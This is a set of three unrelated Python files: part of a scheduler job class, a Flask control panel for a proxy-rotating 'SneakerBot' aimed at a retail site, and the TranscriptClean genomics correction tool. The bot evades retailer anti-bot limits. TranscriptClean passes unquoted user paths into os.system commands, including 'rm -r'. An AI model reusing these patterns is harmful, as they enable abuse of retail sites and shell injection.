# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.scheduler.id = self.id
self._start_listen_events()
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.executor.start()
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
self.scheduler.recover(self.last_scheduling_id)
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
self.scheduler.stop_timer()
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=int(time.time() * 1000),
version=None
)
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
|
app.py
|
import versionCheck
# ^ Checks for Python 2.x; this fixes a really common problem I'm getting messages about.
from flask import Flask, render_template, request, url_for, redirect, Markup, jsonify, make_response, send_from_directory, session
import requests
import sys
import bs4
import RandomHeaders
import re
import urllib
import threading
import time
import main
import csv
from time import gmtime, strftime
app = Flask(__name__, static_url_path='/static')
# Sets the static folder
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
# Flask settings
PROXIES = []
# Defines initial proxy list
sessionInfo = {}
# Info about this specific browser session
bot = main.bot([])
#bot is initiated with a LIST of STRINGS for proxies... not dicts
TEST_URL = 'http://www.adidas.com/'
# For the proxy test
@app.after_request
# No caching at all for API endpoints.
def add_header(r):
"""
Add headers that force the latest IE rendering engine or Chrome Frame,
and disable caching so every response is served fresh.
"""
r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
r.headers["Pragma"] = "no-cache"
r.headers["Expires"] = "0"
r.headers['Cache-Control'] = 'public, max-age=0'
return r
def configure_proxy_settings(ip, port, username=None, password=None):
"""
Configuring proxies to pass to request
:param ip: The IP address of the proxy you want to connect to, e.g. 127.0.0.1
:param port: The port number of the proxy server you are connecting to
:param username: The username if authentication is required. Needs to be accompanied by a `password`.
Defaults to None if not provided
:param password: The password if authentication is required. Needs to be accompanied by a `username`.
Defaults to None if not provided
:return: A dictionary of proxy settings
"""
proxies = None
credentials = ''
# If no IP address or port information is passed in, the proxy information will remain `None`
# If no proxy information is set, the default settings for the machine will be used
if ip is not None and port is not None:
# Username and password are optional; credentials are added only when both are provided
if username is not None and password is not None:
credentials = '{}:{}@'.format(username, password)
proxies = {'http': 'http://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port),
'https': 'https://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port)
}
return proxies
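# Illustrative call (sketch with assumed values): building a requests-style proxies dict.
#
#     configure_proxy_settings('127.0.0.1', 8080, username='user', password='pass')
#     # -> {'http': 'http://user:pass@127.0.0.1:8080',
#     #     'https': 'https://user:pass@127.0.0.1:8080'}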
def getPing(url, ip, port, timeout=8):
#If someone could make a better implementation of this that would be awesome
proxies = configure_proxy_settings(ip, port)
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.9'
}
start = time.time()
# Start time
nf = requests.get(url, proxies=proxies, headers=headers, timeout=timeout)
# Makes the request through the proxy settings built above
page = nf.content
# Makes sure it's successful
nf.close()
# Closes out the request
end = time.time()
# Gets the total time
return format((end - start), '.5f')
# Returns the ping
def returnTime():
# I know this doesn't adjust for local time - will fix this soon
return strftime("%H:%M:%S", gmtime())
def massTestProxies(listOfProxies):
# Tests all proxies in the list of proxies
RESPONSE = []
# This is a list of python dictionaries containing information about the proxies
def addToList(proxy):
try:
print("testing proxy: {}".format(proxy))
proxyInfo = {}
ip = proxy.partition(":")[0]
# Extracts address
port = proxy.partition(':')[2]
# Extracts port
url = TEST_URL
# Sets the URL to TEST_URL constant
proxyInfo['IP'] = ip
# IP Address
proxyInfo['Port'] = port
# Port Number
proxyInfo['Ping'] = getPing('https://whatismyipaddress.com/', ip=ip, port=port)
# Sets ping
proxyInfo['ConnectTime'] = returnTime()
# Time that the proxy was tested
RESPONSE.append(proxyInfo)
# Appends info
print("done: {}".format(proxy))
# Output saying the proxy was successful
except Exception as exp:
# This means the proxy failed
print(exp)
# Prints the exception string
print("proxy: {} failed".format(proxy))
return
threads = [threading.Thread(target=addToList, args=(proxy,)) for proxy in listOfProxies]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return RESPONSE
# Returns the list of proxy details
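# Illustrative result shape (sketch with assumed proxies; each call makes real HTTP
# requests): a working proxy yields a dict like
#     {'IP': '127.0.0.1', 'Port': '8080', 'Ping': '0.41233', 'ConnectTime': '14:02:11'}
# while proxies that fail the test are simply omitted from the returned list.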
def returnProxies(csvpath):
# Opens the proxy CSV
with open(csvpath, 'rb') as f:
reader = csv.reader(f)
return list(reader)
def getCommits():
for i in range(5):
# Loops through five times or until it is successful
try:
url = 'https://github.com/theriley106/SneakerBotTutorials'
res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
# Pulls the page
page = bs4.BeautifulSoup(res.text, 'lxml')
# Parses the HTML
updateCount = str(page).partition('<span class="num text-emphasized">')[2].partition("<")[0].strip()
# This is the element that contains the commit count
lastUpdate = page.select('relative-time')[0].getText()
# This is the time of the last update
if len(updateCount) > 2:
# This means it was successful
return [lastUpdate, updateCount]
except Exception as exp:
pass
return "ERROR"
@app.route('/changeHeader', methods=['POST'])
def headerChange():
# Reads the new header string submitted from the form
#print str(list(request.form.items())[0][1])
bot.updateHeader(str(list(request.form.items())[0][1]))
# Updates header to the one inputted into the site
return redirect(url_for('useBot'))
#perhaps it would be better to have default variables set for index, and this will edit default variables?
# ie: index(headers=None, url=None, etc)
@app.route('/goToURL', methods=['POST'])
def goToURL():
# Reads the target URL submitted from the form
#print str(list(request.form.items())[0][1])
bot.sendAllToURL(url=str(list(request.form.items())[0][1]))
# Send all of the browser windows to the URL inputted into the web app
return redirect(url_for('useBot'))
@app.route('/openDriver', methods=['POST'])
def driverAdd():
# Opens all drivers
bot.startAllDrivers()
return redirect(url_for('useBot'))
@app.route('/', methods=['GET'])
def index():
# First page
gitCommits = getCommits()
# Grabs the current amount of Git Commits
sessionInfo['lastUpdate'] = gitCommits[0]
# Last commit time
sessionInfo['gitCommits'] = gitCommits[1]
# Total number of commits
sessionInfo['info'] = massTestProxies(PROXIES)
# Contains info about the proxies being used
print("Done mass test")
bot.startAllDrivers()
# Starts all drivers
return redirect(url_for('useBot'))
@app.route('/botInfo', methods=['GET'])
def useBot():
proxyLists = []
# List of the proxies being used
for proxy in bot.successProxies:
# Goes through a list of all the working proxies
proxyLists.append(proxy.partition(':')[0])
# Only appends the ip
return render_template("index.html", gitCommits=sessionInfo['gitCommits'], lastUpdate=sessionInfo['lastUpdate'], URL=bot.targetURL, proxyInfo=sessionInfo['info'], driverInfo=bot.driverInfo, proxyDiff=len(bot.failedProxies), allProxies=proxyLists)
@app.route('/test', methods=['GET'])
def testTemplate():
# This is just a test page to make sure everything is working properly
return render_template("index.html", gitCommits=100, lastUpdate='Dec 3', proxyInfo=[{"IP": '41', "Port": '41', "Ping": '132', "ConnectTime": '321'}], driverInfo=[{'proxy': 'proxy', 'driver': 'driver', 'url': 'url', 'useragent': 'self.headers'}], proxyDiff=4)
if __name__ == '__main__':
if len(sys.argv) > 1:
if '.csv' in str(sys.argv[1]):
PROXIES = returnProxies(sys.argv[1])
if len(sys.argv) > 1 and '.csv' not in str(sys.argv[1]):
for proxy in sys.argv[1:]:
PROXIES.append(proxy)
for proxy in PROXIES:
bot.addProxy(proxy)
print("Initiating Bot with Proxy: {}".format(proxy))
else:
print("It looks like you didn't input any Proxies.")
if 'bypass' not in sys.argv:
if raw_input("It is HIGHLY recommended that you use proxies. Continue without? [Y/N] ").lower() == 'n':
raise Exception("Input Proxies...")
if 'admin' in str(sys.argv).lower():
r = requests.post("http://138.197.123.15:8888/proxies/{}".format(open('../../SecretCode.txt').read().strip())).json()
PROXIES = r["proxies"][-10:]
try:
bot = main.bot(PROXIES)
except:
if raw_input("You need to install PhantomJS to use this program. Continue without? [Y/N ").lower() == 'n':
raise Exception("Install PhantomJS...")
app.run(host='0.0.0.0', port=8000)
|
TranscriptClean.py
|
# TranscriptClean
# Author: Dana Wyman
# 3/1/2018
# -----------------------------------------------------------------------------
# Mismatches and microindels in long reads are corrected in a variant-aware
# fashion using the reference genome and a VCF file of whitelisted variants.
# Noncanonical splice junctions can also be corrected using a file of reference
# splice sites.
# TC Classes
from transcript import Transcript
from transcript import check_seq_and_cigar_length
from spliceJunction import *
from intronBound import IntronBound
from optparse import OptionParser
import dstruct
# Other modules
import pybedtools
from pyfasta import Fasta
import os
import multiprocessing as mp
from math import ceil
import re
from copy import copy
import warnings
## Runtime profiling
import cProfile
import time
from datetime import timedelta
def main():
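# Overall flow: split the SAM input into one chunk per thread, check that the
# SAM chromosomes exist in the reference inputs, correct (or dry-run) each
# chunk in its own process, then merge the per-process outputs at the end.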
options = getOptions()
sam_file = options.sam
n_threads = options.n_threads
header, sam_chroms, sam_chunks = split_SAM(sam_file, n_threads)
validate_chroms(options.refGenome, options.variantFile, sam_chroms)
# Run the processes. Outfiles are created within each process
processes = [ ]
for i in range(n_threads):
if options.dryRun == True:
t = mp.Process(target=run_chunk_dryRun, args=(sam_chunks[i], options))
else:
t = mp.Process(target=run_chunk, args=(sam_chunks[i], options, header))
# Run the process
processes.append(t)
t.start()
# Wait for all processes to finish
for one_process in processes:
one_process.join()
# When the processes have finished, combine the outputs together.
start_time = time.time()
combine_outputs(header, options)
end_time = time.time()
human_time = str(timedelta(seconds=int(end_time - start_time)))
print("Took %s to combine all outputs." % (human_time))
def getOptions():
parser = OptionParser()
parser.add_option("--sam", "-s", dest = "sam",
help = ("Input SAM file containing transcripts to "
"correct. Must contain a header."),
metavar = "FILE", type = "string", default = "")
parser.add_option("--genome", "-g", dest = "refGenome",
help = ("Reference genome fasta file. Should be the "
"same one used during mapping to generate the "
"provided SAM file."),
metavar = "FILE", type = "string", default = "")
parser.add_option("--threads", "-t", dest = "n_threads",
help = ("Number of threads to run program with."),
type = "int", default = 1)
parser.add_option("--spliceJns", "-j", dest = "sjAnnotFile",
help = ("Splice junction file obtained by mapping "
"Illumina reads to the genome using STAR, or "
"alternately, extracted from a GTF using the "
"accessory script. More formats may be "
"supported in the future."),
metavar = "FILE", type = "string", default = None)
parser.add_option("--variants", "-v", dest = "variantFile",
help = ("VCF formatted file of variants to avoid "
"correcting away in the data (optional)."),
metavar = "FILE", type = "string", default = None )
parser.add_option("--maxLenIndel", dest = "maxLenIndel",
help = "Maximum size indel to correct (Default: 5 bp)",
type = "int", default = 5 )
parser.add_option("--maxSJOffset", dest = "maxSJOffset",
help = ("Maximum distance from annotated splice junction "
"to correct (Default: 5 bp)"),
type = "int", default = 5 )
parser.add_option("--outprefix", "-o", dest = "outprefix",
help = ("Output file prefix. '_clean' plus a file "
"extension will be added to the end."),
metavar = "FILE", type = "string", default = "TC")
parser.add_option("--correctMismatches", "-m", dest = "correctMismatches",
help = ("If set to false, TranscriptClean will skip "
"mismatch correction. Default: true"),
type = "string", default = "true" )
parser.add_option("--correctIndels", "-i", dest = "correctIndels",
help = "If set to false, TranscriptClean will skip indel \
correction. Default: true", type = "string",
default = "true")
parser.add_option("--correctSJs", dest = "correctSJs",
help = ("If set to false, TranscriptClean will skip "
"splice junction correction. Default: true, but you must "
"provide a splice junction annotation file in order for "
"it to work."), type = "string", default = "true")
parser.add_option("--dryRun", dest ="dryRun", action='store_true',
help = ("If this option is set, TranscriptClean will "
"read in the sam file and record all insertions, "
"deletions, and mismatches, but it will skip "
"correction. This mode is useful for checking "
"the distribution of transcript errors in the "
"data before running correction."))
parser.add_option("--primaryOnly", dest ="primaryOnly", action='store_true',
help = "If this option is set, TranscriptClean will only \
output primary mappings of transcripts (i.e. it will filter \
out unmapped and multimapped lines from the SAM input).",
default = False)
parser.add_option("--canonOnly", dest ="canonOnly", action='store_true',
help = ("If this option is set, TranscriptClean will "
"output only canonical transcripts and transcripts "
"containing annotated noncanonical junctions to the "
"clean SAM file at the end of the run."), default = False)
parser.add_option("--tmpDir", dest ="tmp_path",
help = ("If you would like the tmp files to be written "
"somewhere different than the final output, "
"provide the path to that location here."),
default = None)
parser.add_option("--bufferSize", dest ="buffer_size",
help = ("Number of lines to output to file at once by "
"each thread during run. Default = 100"),
type = "int", default = 100)
parser.add_option("--deleteTmp", dest ="delete_tmp", action='store_true',
help = ("If this option is set, the temporary directory "
"generated by TranscriptClean (TC_tmp) will be "
"removed at the end of the run."))
(options, args) = parser.parse_args()
options = cleanup_options(options)
return options
def cleanup_options(options):
""" Clean up input options by casting to appropriate types etc. """
options.n_threads = int(options.n_threads)
options.buffer_size = int(options.buffer_size)
options.maxLenIndel = int(options.maxLenIndel)
options.maxSJOffset = int(options.maxSJOffset)
options.correctIndels = (options.correctIndels).lower()
options.correctMismatches = (options.correctMismatches).lower()
options.correctSJs = (options.correctSJs).lower()
# Screen options for correctness
if options.correctMismatches not in ["true", "false"]:
raise RuntimeError(("Invalid choice for --correctMismatches/-m option. "
"Valid choices are 'true' and 'false'"))
if options.correctIndels not in ["true", "false"]:
raise RuntimeError(("Invalid choice for --correctIndels/-i option. "
"Valid choices are 'true' and 'false'"))
if options.correctSJs not in ["true", "false"]:
raise RuntimeError(("Invalid choice for --correctSJs option. "
"Valid choices are 'true' and 'false'"))
# Use custom tmp dir location if provided
if options.tmp_path != None:
if os.path.isdir(options.tmp_path):
options.tmp_dir = "/".join((options.tmp_path).split("/") + ["TC_tmp/"])
else:
options.tmp_dir = "/".join((options.tmp_path).split("/")[0:-1] + ["TC_tmp/"])
else:
options.tmp_dir = "/".join((options.outprefix).split("/")[0:-1] + ["TC_tmp/"])
# If there is a tmp dir there already, remove it
if os.path.exists(options.tmp_dir):
os.system("rm -r %s" % options.tmp_dir)
os.system("mkdir -p %s" % options.tmp_dir)
# If the specified outprefix is a directory, add TC default prefix to it
if os.path.isdir(options.outprefix):
options.outprefix = "/".join((options.outprefix).split("/") + ["TC"])
return options
def prep_refs(options, transcripts, sam_header):
""" Process input files and store them in a reference dict.
        SAM transcripts and header are needed if variants are provided because
the variant file will be filtered to include only those that overlap
the SAM reads. """
tmp_dir = options.tmp_dir
os.system("mkdir -p %s" % tmp_dir)
genomeFile = options.refGenome
variantFile = options.variantFile
sjFile = options.sjAnnotFile
# Container for references
refs = dstruct.Struct()
# Read in the reference genome.
print("Reading genome ..............................")
refs.genome = Fasta(options.refGenome)
ref_chroms = sorted((refs.genome.keys()))
# Create a tmp SAM file for the provided reads
proc = str(os.getpid())
tmp_sam, sam_chroms = create_tmp_sam(sam_header, transcripts, options.tmp_dir, process = proc)
# Read in splice junctions
refs.donors = None
refs.acceptors = None
refs.sjAnnot = set()
if options.correctSJs == "false":
print("SJ correction turned off in options. Skipping reference SJ parsing.")
elif sjFile != None:
print("Processing annotated splice junctions ...")
refs.donors, refs.acceptors, refs.sjAnnot = processSpliceAnnotation(sjFile,
tmp_dir, sam_chroms, process = proc)
else:
print("No splice annotation provided. Will skip splice junction correction.")
# Read in variants
if variantFile != None:
print("Processing variant file .................")
refs.snps, refs.insertions, refs.deletions = processVCF(variantFile,
options.maxLenIndel,
tmp_dir,
tmp_sam,
process = proc)
else:
print("No variant file provided. Transcript correction will not be variant-aware.")
refs["snps"] = refs["insertions"] = refs["deletions"] = {}
return refs
def create_tmp_sam(sam_header, transcripts, tmp_dir, process = "1"):
""" Put the transcripts in the provided list into a temporary SAM file,
preceded by the provided header (list form). The file will be located in
        a 'split_uncorr_sams' subdirectory of the provided tmp_dir. Returns the name of the tmp
file as well as the chromosomes found within"""
sam_dir = tmp_dir + "split_uncorr_sams/"
sam_name = sam_dir + process + ".sam"
os.system("mkdir -p %s" % (sam_dir))
chroms = set()
with open(sam_name, 'w') as f:
for item in sam_header:
f.write("%s\n" % item)
for transcript in transcripts:
f.write("%s\n" % transcript)
chroms.add(transcript.split('\t')[2])
return sam_name, chroms
def setup_outfiles(options, process = "1"):
""" Set up output files. If running in parallel, label with a process ID """
# Place files in a tmp directory
tmp_dir = options.tmp_dir
os.system("mkdir -p " + tmp_dir)
outfiles = dstruct.Struct()
# Open sam, fasta, and log outfiles
oSam = open(tmp_dir + "clean_" + process + ".sam", 'w')
oFa = open(tmp_dir + "clean_" + process + ".fa", 'w')
transcriptLog = open(tmp_dir + "clean_" + process + ".log", 'w')
transcriptErrorLog = open(tmp_dir + "clean_" + process + ".TElog", 'w')
outfiles.sam = oSam
outfiles.fasta = oFa
outfiles.log = transcriptLog
outfiles.TElog = transcriptErrorLog
return outfiles
def close_outfiles(outfiles):
""" Close all of the output files """
for f in list(outfiles.values()):
f.close()
return
def transcript_init(transcript_line, genome, sjAnnot):
""" Attempt to initialize a Transcript object from a SAM entry. First,
create a log object, and note the mapping status of the read. If the
transcript alignment is unmapped or non-primary, then create a log
entry for the transcript, but do not bother initializing a transcript
        object. Otherwise, return the transcript object along with
the log.
Input:
- Transcript SAM line (string)
            - Reference genome (needed to determine the canonical-ness of junctions)
- Splice annot set object (needed to look up whether a junction
is annotated or not)
Returns:
- Transcript object if primary alignment, None if not
- logInfo object
"""
# Check mapping
sam_fields = transcript_line.split('\t')
logInfo = init_log_info(sam_fields)
if logInfo.Mapping != "primary":
return None, logInfo
try:
transcript = Transcript(sam_fields, genome, sjAnnot)
except Exception as e:
warnings.warn("Problem parsing transcript with ID '" + \
logInfo.TranscriptID + "'")
print(e)
return None, logInfo
return transcript, logInfo
def batch_correct(sam_transcripts, options, refs, outfiles, buffer_size = 100):
"""Correct and output n lines of transcript SAM file at a time in a batch.
The purpose is to stagger when the different threads are writing to disk.
For a given transcript, there can be only one sam, fasta, and log entry,
but there can be more than one transcript error (TE)."""
print("Correcting transcripts...")
outSam = outfiles.sam
outFa = outfiles.fasta
tL = outfiles.log
tE = outfiles.TElog
sam_lines = fasta_lines = log_lines = TE_log_lines = ""
counter = 0
for transcript_line in sam_transcripts:
transcript, logInfo, TE_entries = correct_transcript(transcript_line,
options, refs)
# If the transcript object returned is None, this means that the
# current read was not a primary mapper. Add to the log file,
# but do not output a fasta sequence. Only output the original
# SAM alignment if primaryOnly and canonOnly modes are off
if transcript == None:
log_lines += create_log_string(logInfo) + "\n"
if options.primaryOnly == False and options.canonOnly == False:
sam_lines += transcript_line + "\n"
# Output the transcript in SAM and Fasta format, plus output the logs
else:
canonical_or_annot = transcript.isCanonical or transcript.allJnsAnnotated
if options.canonOnly == False or canonical_or_annot == True:
sam_lines += transcript.printableSAM() + "\n"
fasta_lines += transcript.printableFa() + "\n"
log_lines += create_log_string(logInfo) + "\n"
TE_log_lines += TE_entries
# Check whether to empty the buffer
if counter > buffer_size:
outSam.write(sam_lines)
outFa.write(fasta_lines)
tL.write(log_lines)
tE.write(TE_log_lines)
sam_lines = fasta_lines = log_lines = TE_log_lines = ""
counter = 0
else:
counter += 1
# Write any remaining lines
outSam.write(sam_lines)
outFa.write(fasta_lines)
tL.write(log_lines)
tE.write(TE_log_lines)
return
def correct_transcript(transcript_line, options, refs):
""" Given a line from a SAM file, create a transcript object. If it's a
primary alignment, then perform the corrections specified in the
options.
"""
orig_transcript, logInfo = transcript_init(transcript_line, refs.genome,
refs.sjAnnot)
TE_entries = ""
if orig_transcript == None:
return orig_transcript, logInfo, TE_entries
# Correct the transcript
try:
upd_transcript = copy(orig_transcript)
upd_logInfo = logInfo
# Mismatch correction
if options.correctMismatches == "true":
mismatch_TE = correctMismatches(upd_transcript, refs.genome,
refs.snps, upd_logInfo)
if mismatch_TE != "":
TE_entries += mismatch_TE
if options.correctIndels == "true":
# Insertion correction
ins_TE = correctInsertions(upd_transcript, refs.genome, refs.insertions,
options.maxLenIndel, upd_logInfo)
if ins_TE != "":
TE_entries += ins_TE
# Deletion correction
del_TE = correctDeletions(upd_transcript, refs.genome, refs.deletions,
options.maxLenIndel, upd_logInfo)
if del_TE != "":
TE_entries += del_TE
# NCSJ correction
if len(refs.sjAnnot) > 0 and options.correctSJs == "true":
upd_transcript, ncsj_TE = cleanNoncanonical(upd_transcript, refs,
options.maxSJOffset,
upd_logInfo)
if ncsj_TE != "":
TE_entries += ncsj_TE
except Exception as e:
warnings.warn(("Problem encountered while correcting transcript "
"with ID %s. Will output original version.") % \
orig_transcript.QNAME)
print(e)
TE_entries = ""
return orig_transcript, logInfo, TE_entries
# After successful correction, return transcript object, updated
# logInfo, and the TE log lines generated during correction
return upd_transcript, upd_logInfo, TE_entries
def validate_chroms(genome_file, vcf_file, sam_chroms):
""" Make sure that every chromosome in the SAM file also exists in the
reference genome. This is a common source of crashes. Also, make sure
that the VCF chromosome naming convention matches the SAM file if the
user has provided a VCF. """
genome = Fasta(genome_file)
fasta_chroms = set(genome.keys())
# Remove '*' from sam chromosome set if present
if "*" in sam_chroms:
sam_chroms.remove("*")
# Check whether all of the sam chromosomes are in the fasta file.
# If not, raise an error
if not sam_chroms.issubset(fasta_chroms):
sam_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in sam_chroms]) + '}'
fasta_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in fasta_chroms]) + '}'
error_msg = 'One or more SAM chromosomes were not found in the fasta reference.\n' + \
'SAM chromosomes:\n' + sam_chroms + '\n' + \
'FASTA chromosomes:\n' + fasta_chroms + '\n' + \
("One common cause of this problem is when the fasta headers "
"contain more than one word. If this is the case, try "
"trimming the headers to include only the chromosome name "
"(i.e. '>chr1').")
raise RuntimeError(error_msg)
# Check VCF chroms
if vcf_file != None:
try:
vcf_obj = pybedtools.BedTool(vcf_file)
except Exception as e:
print(e)
raise RuntimeError(("Problem reading the provided VCF file. Please "
"make sure that the filename is correct, that "
"pybedtools is installed, and that your VCF "
"file is properly formatted, including a header."))
vcf_chroms = set([x.chrom for x in vcf_obj])
if len(sam_chroms.intersection(vcf_chroms)) == 0:
sam_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in sam_chroms]) + '}'
vcf_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in vcf_chroms]) + '}'
error_msg = ("None of the chromosomes included in the VCF file "
"matched the chromosomes in the provided SAM file.\n"
'SAM chromosomes:\n' + sam_chroms + '\n'
'VCF chromosomes:\n' + vcf_chroms + '\n')
raise RuntimeError(error_msg)
return
def split_SAM(samFile, n):
""" Given a sam file, separate the header line from the remaining entries,
record which chromosomes are present in the reads, and split the reads
into n chunks.
"""
header = []
chroms = set()
transcript_lines = []
with open(samFile, 'r') as f:
for line in f:
line = line.strip()
if line.startswith('@'):
header.append(line)
else:
transcript_lines.append(line)
chrom = line.split("\t")[2]
chroms.add(chrom)
# Now split the transcripts into n chunks
chunks = split_input(transcript_lines, n)
return header, chroms, chunks
def split_input(my_list, n):
""" Splits input into n sublists of roughly equal size"""
chunks = []
index = 0
batch_size = ceil(len(my_list)/n)
while index < len(my_list):
try:
batch = my_list[index:index + batch_size]
except:
batch = my_list[index:]
chunks.append(batch)
index += batch_size
return chunks
def run_chunk(transcripts, options, sam_header):
""" Contains everything needed to run a subset of the transcript input
on its own core """
# Prep the references (i.e. genome, sjs, variants)
start_time = time.time()
refs = prep_refs(options, transcripts, sam_header)
end_time = time.time()
time_slice = end_time - start_time
human_time = str(timedelta(seconds=int(time_slice)))
print("Reference file processing took %s" % (human_time))
# Set up the outfiles
outfiles = setup_outfiles(options, str(os.getpid()))
# Correct the transcripts
start_time = time.time()
batch_correct(transcripts, options, refs, outfiles,
buffer_size = options.buffer_size)
end_time = time.time()
human_time = str(timedelta(seconds=int(end_time - start_time)))
print("Took %s to process transcript batch." % (human_time))
# Close up the outfiles
close_outfiles(outfiles)
return
def run_chunk_dryRun(transcripts, options):
""" Run dryRun mode on a set of transcripts on one core """
# Set up the outfiles
outfiles = setup_outfiles(options, str(os.getpid()))
# Run dryRun mode
dryRun(transcripts, options, outfiles)
# Close up the outfiles
close_outfiles(outfiles)
return
def combine_outputs(sam_header, options):
""" Combine sam, fasta, and log outputs from separate sub-runs into the
final output files. Then, remove the temporary directory.
"""
outprefix = options.outprefix
tmp_dir = options.tmp_dir
# Make filenames
sam = outprefix + "_clean.sam"
fasta = outprefix + "_clean.fa"
log = outprefix + "_clean.log"
TElog = outprefix + "_clean.TE.log"
# Open log outfiles
if os.path.exists(log):
os.remove(log)
if os.path.exists(TElog):
os.remove(TElog)
transcriptLog = open(log, 'w')
transcriptErrorLog = open(TElog, 'w')
# Add headers to logs
transcriptLog.write("\t".join(["TranscriptID", "Mapping",
"corrected_deletions", "uncorrected_deletions",
"variant_deletions", "corrected_insertions",
"uncorrected_insertions", "variant_insertions", \
"corrected_mismatches", "uncorrected_mismatches", \
"corrected_NC_SJs", "uncorrected_NC_SJs"]) + "\n")
transcriptErrorLog.write("\t".join(["TranscriptID", "Position", "ErrorType",
"Size", "Corrected", "ReasonNotCorrected"]) + "\n")
# Add header to sam file
if options.dryRun != True:
if os.path.exists(sam):
os.remove(sam)
oSam = open(sam, 'w')
for line in sam_header:
oSam.write(line + "\n")
oSam.close()
# Close files
transcriptLog.close()
transcriptErrorLog.close()
# Now combine the subfiles
if options.dryRun != True:
os.system("cat %s/*.sam >> %s" % (tmp_dir, sam))
os.system("cat %s/*.fa > %s" % (tmp_dir, fasta))
os.system("cat %s/*.log >> %s" % (tmp_dir, log))
os.system("cat %s/*.TElog >> %s" % (tmp_dir, TElog))
# Clean up the temporary directory if requested
if options.delete_tmp:
os.system("rm -r %s" % tmp_dir)
return
def processSpliceAnnotation(annotFile, tmp_dir, read_chroms, process = "1"):
""" Reads in the tab-separated STAR splice junction file and creates a
bedtools object. Also creates a dict (annot) to allow easy lookup
to find out if a splice junction is annotated or not. Only junctions
located on the provided chromosomes are included."""
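    # The annotation file is expected to follow the STAR SJ.out.tab layout
    # (1-based intron coordinates): chrom, intron start, intron end,
    # strand (0 = undefined, 1 = +, 2 = -), intron motif, annotated flag,
    # unique read count, multi-mapping read count, and max spliced overhang.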
bedstr = ""
annot = set()
tmp_dir = tmp_dir + "splice_files/"
os.system("mkdir -p %s" % (tmp_dir))
donor_file = tmp_dir + "%s_ref_splice_donors_tmp.bed" % (process)
acceptor_file = tmp_dir + "%s_ref_splice_acceptors_tmp.bed" % (process)
o_donor = open(donor_file, 'w')
o_acceptor = open(acceptor_file, 'w')
with open(annotFile, 'r') as f:
for line in f:
fields = line.strip().split("\t")
chrom = fields[0]
if chrom not in read_chroms:
continue
start = int(fields[1])
end = int(fields[2])
strand = "."
if fields[3] == "1": strand = "+"
if fields[3] == "2": strand = "-"
intronMotif = int(fields[4])
annotated = int(fields[5])
uniqueReads = fields[6]
multiReads = fields[7]
maxOverhang = fields[8]
# ID the splice donor/acceptor identity
if strand == "+":
file1 = o_donor
file2 = o_acceptor
type1 = "donor"
type2 = "acceptor"
elif strand == "-":
file1 = o_acceptor
file2 = o_donor
type1 = "acceptor"
type2 = "donor"
# Make one bed entry for each end of the junction and write to
# splice donor and acceptor files
bed1 = "\t".join([chrom, str(start - 1), str(start), ".", "name", strand])
bed2 = "\t".join([chrom, str(end - 1), str(end), ".", "name", strand])
file1.write(bed1 + "\n")
file2.write(bed2 + "\n")
# Add a record of the entire junction to the annot set to indicate
# that it is annotated
junction = "_".join([chrom, str(start), strand]) + "," + \
"_".join([chrom, str(end), strand])
annot.add(junction)
o_donor.close()
o_acceptor.close()
# Convert bed files into BedTool objects
donor_sorted = tmp_dir + "%s_ref_splice_donors_tmp.sorted.bed" % (process)
acceptor_sorted = tmp_dir + "%s_ref_splice_acceptors_tmp.sorted.bed" % (process)
os.system('sort -u %s | bedtools sort -i - > %s' % (donor_file, donor_sorted))
